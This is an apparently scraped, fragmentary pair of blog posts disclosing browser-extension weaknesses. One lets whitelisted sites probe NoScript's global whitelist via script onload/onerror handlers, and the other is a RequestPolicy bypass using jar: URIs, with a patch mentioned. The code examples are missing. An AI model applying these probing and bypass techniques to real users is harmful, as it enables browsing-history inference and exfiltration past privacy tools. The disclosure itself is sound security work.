and caretPositionFromPoint
Most of the pertinent info is in the previous paper, but I’ll give a brief summary. By default NoScript operates in whitelist mode, forbidding scripts from all domains. Once a site has been added to the whitelist, scripts from that domain as well as those included from other whitelisted domains may be executed on the page.
NoScript’s default whitelist is fairly small, and users don’t generally share sets of whitelist rules (like with Adblock Plus,) so if a site is whitelisted the user must have used or visited that site.
Since the only whitelist is a global one (allowing scripts to run on facebook.com also allows other whitelisted domains to execute scripts from facebook.com,) whitelisted sites may infer what other sites are on the whitelist by including scripts from other domains and checking whether or not they execute.
The method described in the paper involves finding a valid script file on the domain you want to test and observing its side effects (modifications to the window
object or the DOM.) This can be tedious for an attacker, and requires a bit of manual work. It may also pollute the DOM / window
object with junk and break our testing code!
Luckily, there’s an easier way. Mike Cardwell describes a method of determining if a cross-origin resource returned a 200 status code using <script>
tags. The <script>
tag’s onload
handler will trigger on a successful HTTP status code, and the onerror
handler will trigger otherwise. The <script>
tag’s onload
handler will trigger even if the resource isn’t a valid script.
The same method may be used to determine if NoScript has blocked a resource that would normally return a 200 HTTP status code. http://domain.tld/
usually returns HTML with a 200 status code, so that’s a pretty good candidate for testing.
For example:
1
|
|
If you have google.com whitelisted, this will say “google loaded!”. Otherwise (or if google.com is down for some reason) this will print “google failed”.
Here’s an example of how the attack may be used, including a timing attack based on the RequestPolicy bypass described in my last post. Mind, the timing attack is a bit spotty, and generally doesn’t work on the first page load. Refresh the page if it doesn’t work the first time.
If you don’t have either RequestPolicy or NoScript installed, here’s what you should see:
Global whitelist entries by their very nature leak info to any other site on the whitelist. This won’t be fixed in NoScript until support for per-site whitelists is added and people are encouraged to remove their old global rules.
In the meantime, using a patched RequestPolicy will give you a per-site whitelist for all cross-domain requests, effectively mitigating the issue.
]]>1
|
|
Firefox will block the resource from being displayed even if it is valid (due to prior security issues with the jar URI scheme,) but a cross-domain request is made and it doesn’t require JS to execute. This can be verified through the network pane in Firefox’s dev tools. A limited amount of information may be sent back from the server by using timing information.
Requests to jar URIs don’t get processed by RequestPolicy because aContentLocation’s asciiHost is undefined when the jar URI scheme is used, and it gets treated as an internal request. Since all internal requests are implicitly allowed, the request goes through.
I emailed Justin the patch a few months ago, but he hasn’t responded. Hopefully this gets fixed on the addons.mozilla.org version soon, since it limits RequestPolicy’s effectiveness at preventing data exfiltration.
For now, you can use my fork of RequestPolicy. I’m not sure if the patch has any interactions with extensions, but it should also fix issues with nested use of the view-source scheme (which for some reason doesn’t implement nsINestedURI)
If you’d like to see whether or not you’re vulnerable, I’ve made a Proof-of-Concept that detects whether or not RequestPolicy blocked an image from a jar URI.
Without the patch:
With the patch:
]]>